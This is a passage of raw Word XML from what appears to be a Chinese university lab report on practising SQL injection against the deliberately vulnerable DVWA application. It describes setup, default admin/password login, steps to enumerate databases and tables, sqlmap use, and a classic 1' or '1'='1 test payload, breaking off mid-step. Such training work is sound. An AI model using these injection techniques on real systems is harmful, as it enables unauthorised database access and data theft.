                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取当前数据库</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FBCBD0" w14:textId="0BAEFB14" w:rsidR="00193749" w:rsidRP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5.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取数据库中的表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="185CF0A0" w14:textId="52E2D441" w:rsidR="00193749" w:rsidRP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6.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>获取表中的字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F95C07D" w14:textId="4087E6AB" w:rsidR="00193749" w:rsidRDefault="00193749" w:rsidP="00193749">
            <w:pPr>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.</w:t>
            </w:r>
            <w:r w:rsidRPr="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>下载数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D4204AB" w14:textId="0DFD17B5" w:rsidR="004E2308" w:rsidRDefault="009C335E" w:rsidP="00CA5C8A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本次实验使用</w:t>
            </w:r>
            <w:r w:rsidRPr="009C335E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidRPr="009C335E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="009C335E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Damn Vulnerable Web Application</w:t>
            </w:r>
            <w:r w:rsidRPr="009C335E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>）应用软件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>练习</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入的思路和过程。</w:t>
            </w:r>
            <w:r w:rsidR="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在实验过程中，我将</w:t>
            </w:r>
            <w:r w:rsidR="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidR="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的安全级别分别设置为</w:t>
            </w:r>
            <w:r w:rsidR="0010222C" w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
            <w:r w:rsidR="0010222C" w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="0010222C" w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
            <w:r w:rsidR="0010222C" w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="0010222C" w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidR="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。最后在每种安全</w:t>
            </w:r>
            <w:r w:rsidR="00CF7919">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别</w:t>
            </w:r>
            <w:r w:rsidR="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>下都成功实现注入并获得了数据库中的内容</w:t>
            </w:r>
            <w:r w:rsidR="00193749">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>其中</w:t>
            </w:r>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别进行了手工注入，也使用了</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>进行了注入；</w:t>
            </w:r>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别编写代码（详见随同提交的</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>_injection.python</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>文件）进行了手工注入</w:t>
            </w:r>
            <w:r w:rsidR="00111E92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00111E92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>也使用了</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00111E92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00111E92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>进行了注入</w:t>
            </w:r>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidR="00F578C7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别进行了手工注入。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0496A2F8" w14:textId="52688ECA" w:rsidR="003545C3" w:rsidRPr="00A52B78" w:rsidRDefault="003545C3" w:rsidP="00553298">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21F6B1E1" w14:textId="7EA71396" w:rsidR="003545C3" w:rsidRDefault="006846A6" w:rsidP="00553298">
            <w:pPr>
              <w:ind w:left="-42" w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>五</w:t>
            </w:r>
            <w:r w:rsidR="003545C3" w:rsidRPr="00822EAE">
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>、实验步骤</w:t>
            </w:r>
            <w:r w:rsidR="00570C65">
              <w:rPr>
                <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>及结果</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3990499F" w14:textId="1DEAD72B" w:rsidR="002E2F42" w:rsidRDefault="009B3818" w:rsidP="00F40884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1</w:t>
            </w:r>
            <w:r w:rsidR="00E61356">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidR="008E42FB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidR="002E2F42">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>虚拟机</w:t>
            </w:r>
            <w:r w:rsidR="003251DF">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00E710D7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>连接</w:t>
            </w:r>
            <w:r w:rsidR="00E710D7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidR="00E710D7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>页面</w:t>
            </w:r>
            <w:r w:rsidR="002E2F42">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="391808D1" w14:textId="23CCB594" w:rsidR="00F40884" w:rsidRDefault="0057346E" w:rsidP="00F40884">
            <w:pPr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3E2DE7B9" wp14:editId="3D96E652">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>791240</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>831850</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4240530" cy="633730"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="1270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12-10 at 6.00.56 P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53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F42">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="008C4CC0" w:rsidRPr="008C4CC0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>从云复旦</w:t>
            </w:r>
            <w:r w:rsidR="008C4CC0" w:rsidRPr="008C4CC0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://cloud.fudan.edu.cn/shareFolder/466220002/UHWpvrr</w:t>
            </w:r>
            <w:r w:rsidR="008C4CC0" w:rsidRPr="008C4CC0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>中下载</w:t>
            </w:r>
            <w:r w:rsidR="00AF638C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CentOS</w:t>
            </w:r>
            <w:r w:rsidR="00AF638C">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.7z</w:t>
            </w:r>
            <w:r w:rsidR="008C4CC0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，解压并利用其中的虚拟硬盘</w:t>
            </w:r>
            <w:r w:rsidR="001F6EAD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidR="001F6EAD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Parallels</w:t>
            </w:r>
            <w:r w:rsidR="001F6EAD">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001F6EAD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Desktop</w:t>
            </w:r>
            <w:r w:rsidR="008C4CC0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008C4CC0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>redhat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008C4CC0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>操作系统获得实验环境</w:t>
            </w:r>
            <w:r w:rsidR="003044BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，使用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085F8F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>作为登入帐号（</w:t>
            </w:r>
            <w:r w:rsidR="003044BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>无密</w:t>
            </w:r>
            <w:r w:rsidR="00085F8F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidR="003044BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>登入，登入目录为</w:t>
            </w:r>
            <w:r w:rsidR="003044BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/home</w:t>
            </w:r>
            <w:r w:rsidR="003044BD">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="003044BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>hacker</w:t>
            </w:r>
            <w:r w:rsidR="00AF638C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。使用命令</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AF638C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ifconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AF638C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>查看虚拟机的局域网</w:t>
            </w:r>
            <w:r w:rsidR="00AF638C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidR="00AF638C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>为：</w:t>
            </w:r>
            <w:r w:rsidR="00AF638C" w:rsidRPr="00AF638C">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>10.211.55.13</w:t>
            </w:r>
            <w:r w:rsidR="00AF638C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，如下图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B9B680" w14:textId="61CBF5E6" w:rsidR="003337D0" w:rsidRDefault="00F024A4" w:rsidP="00F40884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通过浏览器连接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>页面（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://10.211.55.13/dvwa</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>），使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>登入。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="451766E6" w14:textId="77777777" w:rsidR="00F024A4" w:rsidRDefault="00F024A4" w:rsidP="00F40884">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E9F362B" w14:textId="6182586F" w:rsidR="00316232" w:rsidRDefault="00F40884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（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）</w:t>
            </w:r>
            <w:r w:rsidR="00E03A53">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>按照</w:t>
            </w:r>
            <w:r w:rsidR="00E03A53">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
            <w:r w:rsidR="00E03A53" w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00E03A53" w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
            <w:r w:rsidR="00E03A53" w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="00E03A53" w:rsidRPr="0010222C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidR="00E03A53">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的顺序</w:t>
            </w:r>
            <w:r w:rsidR="00686F00">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>依次进行</w:t>
            </w:r>
            <w:r w:rsidR="00686F00">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidR="00686F00">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入攻击：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60877356" w14:textId="143F0FC8" w:rsidR="00316232" w:rsidRDefault="00316232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Low</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>级别：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524D372F" w14:textId="05865CC0" w:rsidR="00B922BD" w:rsidRDefault="00B922BD" w:rsidP="00B006F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 xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>手工注入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B255271" w14:textId="0BE90C29" w:rsidR="00316232" w:rsidRPr="00316232" w:rsidRDefault="00316232" w:rsidP="00316232">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00316232">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00316232">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidRPr="00316232">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>安全级别为</w:t>
            </w:r>
            <w:r w:rsidRPr="00316232">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4623AC37" w14:textId="482C552F" w:rsidR="008F04D5" w:rsidRPr="008F04D5" w:rsidRDefault="008F04D5" w:rsidP="008F04D5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/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4502F833" wp14:editId="5F33F280">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1242953</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>257175</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3150870" cy="1707515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12-10 at 6.22.25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70" cy="17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判断是否存在注入：</w:t>
            </w:r>
            <w:r w:rsidRPr="008F04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>输入</w:t>
            </w:r>
            <w:r w:rsidRPr="008F04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00073E2C" w:rsidRPr="00B922BD">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">' </w:t>
            </w:r>
            <w:r w:rsidRPr="008F04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidR="00B922BD">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00073E2C" w:rsidRPr="00B922BD">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="008F04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r w:rsidR="00073E2C" w:rsidRPr="00B922BD">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">' </w:t>
            </w:r>
            <w:r w:rsidRPr="008F04D5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidR="00B922BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00073E2C" w:rsidRPr="00B922BD">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="008F04D5">
